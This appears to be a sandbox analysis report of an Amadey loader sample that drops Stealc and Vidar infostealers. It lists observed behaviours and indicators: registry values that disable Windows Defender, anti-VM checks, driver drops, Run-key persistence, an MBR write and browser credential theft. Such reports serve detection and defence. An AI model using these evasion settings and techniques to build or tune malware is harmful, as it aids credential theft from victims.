amadey | 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	ab7380df2b.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	ab7380df2b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	ab7380df2b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	ab7380df2b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	ab7380df2b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	ab7380df2b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	ab7380df2b.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ab7380df2b.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	ab7380df2b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	ab7380df2b.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2492 created 2560	2492	MSBuild.exe	42

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b842abf8f3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ec9a0b61cd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fd5d9b8176.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cf533b34eb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	74957b3341.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ab7380df2b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2579	9224	powershell.exe
2905	11572	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
9224	powershell.exe
11572	powershell.exe
4756	powershell.exe
3500	powershell.exe
7516	powershell.exe
9500	powershell.exe
10120	powershell.exe
10888	powershell.exe
10960	powershell.exe
11092	powershell.exe

Downloads MZ/PE file 27 IoCs

flow	pid	Process
75	5788	rapes.exe
75	5788	rapes.exe
75	5788	rapes.exe
75	5788	rapes.exe
534	1192	74957b3341.exe
534	1192	74957b3341.exe
534	1192	74957b3341.exe
534	1192	74957b3341.exe
534	1192	74957b3341.exe
534	1192	74957b3341.exe
705	5788	rapes.exe
705	5788	rapes.exe
705	5788	rapes.exe
705	5788	rapes.exe
3566	12980	svchost015.exe
4403	8148	svchost015.exe
62	5788	rapes.exe
629	5788	rapes.exe
668	5788	rapes.exe
588	5788	rapes.exe
588	5788	rapes.exe
588	5788	rapes.exe
627	4980	svchost.exe
27	5788	rapes.exe
622	5788	rapes.exe
2579	9224	powershell.exe
2905	11572	powershell.exe

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\6bbb4d94.sys	a28245d7.exe
File created	C:\Windows\System32\Drivers\klupd_6bbb4d94a_arkmon.sys	a28245d7.exe
File created	C:\Windows\System32\Drivers\klupd_6bbb4d94a_klbg.sys	a28245d7.exe
File created	C:\Windows\System32\Drivers\06b074ad.sys	a28245d7.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

credential_access stealer

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\6bbb4d94\ImagePath = "System32\\Drivers\\6bbb4d94.sys"	a28245d7.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_arkmon.sys"	a28245d7.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klbg\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klbg.sys"	a28245d7.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klark.sys"	a28245d7.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_mark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_mark.sys"	a28245d7.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_6bbb4d94a_arkmon.sys"	a28245d7.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\06b074ad\ImagePath = "System32\\Drivers\\06b074ad.sys"	a28245d7.exe

Uses browser remote debugging 2 TTPs 25 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
4180	msedge.exe
1636	chrome.exe
2004	chrome.exe
5672	msedge.exe
3920	chrome.exe
3652	chrome.exe
5404	chrome.exe
6088	msedge.exe
6024	msedge.exe
5472	chrome.exe
4064	msedge.exe
2952	msedge.exe
3124	chrome.exe
3840	chrome.exe
3612	msedge.exe
5540	msedge.exe
5432	chrome.exe
6368	chrome.exe
6484	chrome.exe
5424	chrome.exe
4900	msedge.exe
5020	chrome.exe
2376	chrome.exe
3784	chrome.exe
4176	msedge.exe

Checks BIOS information in registry 2 TTPs 30 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b842abf8f3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cf533b34eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fd5d9b8176.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cf533b34eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b842abf8f3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	74957b3341.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ab7380df2b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fd5d9b8176.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ab7380df2b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ec9a0b61cd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	74957b3341.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ec9a0b61cd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	mshta.exe

Deletes itself 1 IoCs

pid	Process
2260	w32tm.exe

Executes dropped EXE 64 IoCs

pid	Process
5788	rapes.exe
4880	UYpk7xI.exe
2428	jokererer.exe
5488	b842abf8f3.exe
3608	rapes.exe
4536	ec9a0b61cd.exe
1192	74957b3341.exe
2720	d0fba8cbde.exe
1360	ab7380df2b.exe
3416	jokererer.exe
4404	rapes.exe
5416	UYpk7xI.exe
6444	7IIl2eE.exe
3116	TbV75ZR.exe
2032	Passwords.com
3580	Rm3cVPI.exe
7092	xZRvIQ5.exe
7116	u75a1_003.exe
4992	EPTwCQd.exe
5584	tzutil.exe
2260	w32tm.exe
976	bot.exe
3516	javaruntime_service.exe
6608	javasupport_update.exe
1520	javaplugin_update.exe
6428	javaplatform_update.exe
6796	javaupdater_update.exe
1808	javaruntimew.exe
5200	javaupdaterw.exe
7052	javasupport.exe
4856	javaruntime_service.exe
6388	javaplatformw.exe
1344	javaplugin_update.exe
7112	javaruntime_platform.exe
5940	javaupdater_platform.exe
4492	javasupport.exe
1500	javaplatform_service.exe
1084	javaruntimew.exe
1408	javaplugin_update.exe
3784	javaplugin_update.exe
7248	javasupport_update.exe
7368	javaplatform_service.exe
7412	javaservice_service.exe
7728	javaservice_service.exe
7776	javaservice.exe
7836	javaplatform_service.exe
7884	javasupport_service.exe
7940	javaplatform_service.exe
7984	javasupport.exe
8036	javaupdater_service.exe
8076	javaservice_service.exe
8128	javaruntimew.exe
8180	javaruntime_update.exe
8228	javaplatform_update.exe
8260	javaruntime_platform.exe
8304	javaupdater.exe
8352	javaplatform_platform.exe
8396	javasupport_platform.exe
8432	javaplugin.exe
8496	javaplatform.exe
8528	javaservice_platform.exe
8580	javasupport_service.exe
8640	javaruntime_service.exe
8680	javasupportw.exe

Identifies Wine through registry keys 2 TTPs 15 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	74957b3341.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	fd5d9b8176.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	cf533b34eb.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	ab7380df2b.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	b842abf8f3.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	ec9a0b61cd.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys	a28245d7.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys\ = "Driver"	a28245d7.exe

Loads dropped DLL 27 IoCs

pid	Process
1192	74957b3341.exe
1192	74957b3341.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	ab7380df2b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ab7380df2b.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplatformw.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplatformw.exe\""	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\c5bf7783-86ce-4113-89e9-ac37bfec346c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{10a91c6c-893d-4b92-8721-7595eee6e93f}\\c5bf7783-86ce-4113-89e9-ac37bfec346c.cmd\""	a28245d7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ec9a0b61cd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361710101\\ec9a0b61cd.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaservice_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaservice_service.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin_service.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9ff7443f7f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361870101\\9ff7443f7f.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361880121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\74957b3341.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361720101\\74957b3341.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d0fba8cbde.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361730101\\d0fba8cbde.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ab7380df2b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361740101\\ab7380df2b.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin_update.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin_update.exe\""	powershell.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\KasperskyLab	a28245d7.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\desktop.ini	firefox.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	firefox.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	firefox.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	a28245d7.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	a28245d7.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral3/files/0x0006000000021593-1028.dat	autoit_exe
behavioral3/files/0x0009000000024be7-30472.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1332	tasklist.exe
2376	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs

pid	Process
5044	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
5788	rapes.exe
5488	b842abf8f3.exe
3608	rapes.exe
4536	ec9a0b61cd.exe
1192	74957b3341.exe
1360	ab7380df2b.exe
4404	rapes.exe
10476	rapes.exe
13160	fd5d9b8176.exe
6588	cf533b34eb.exe
10624	TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE
12232	483d2fa8a0d53818306efeb32d3.exe
3972	rapes.exe
7780	rapes.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 4880 set thread context of 5196	4880	UYpk7xI.exe	97
PID 2428 set thread context of 4580	2428	jokererer.exe	101
PID 3416 set thread context of 7164	3416	jokererer.exe	218
PID 5416 set thread context of 2716	5416	UYpk7xI.exe	221
PID 3116 set thread context of 2492	3116	TbV75ZR.exe	236
PID 7092 set thread context of 7080	7092	xZRvIQ5.exe	261
PID 4992 set thread context of 1728	4992	EPTwCQd.exe	273
PID 13160 set thread context of 12980	13160	fd5d9b8176.exe	376
PID 6588 set thread context of 8148	6588	cf533b34eb.exe	378
PID 7796 set thread context of 5612	7796	4220f70f80.exe	382

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	36575e69.exe
File opened (read-only)	\??\VBoxMiniRdrDN	a28245d7.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	a28245d7.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	a28245d7.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3916	2492	WerFault.exe	236

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ab7380df2b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	u75a1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fd5d9b8176.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
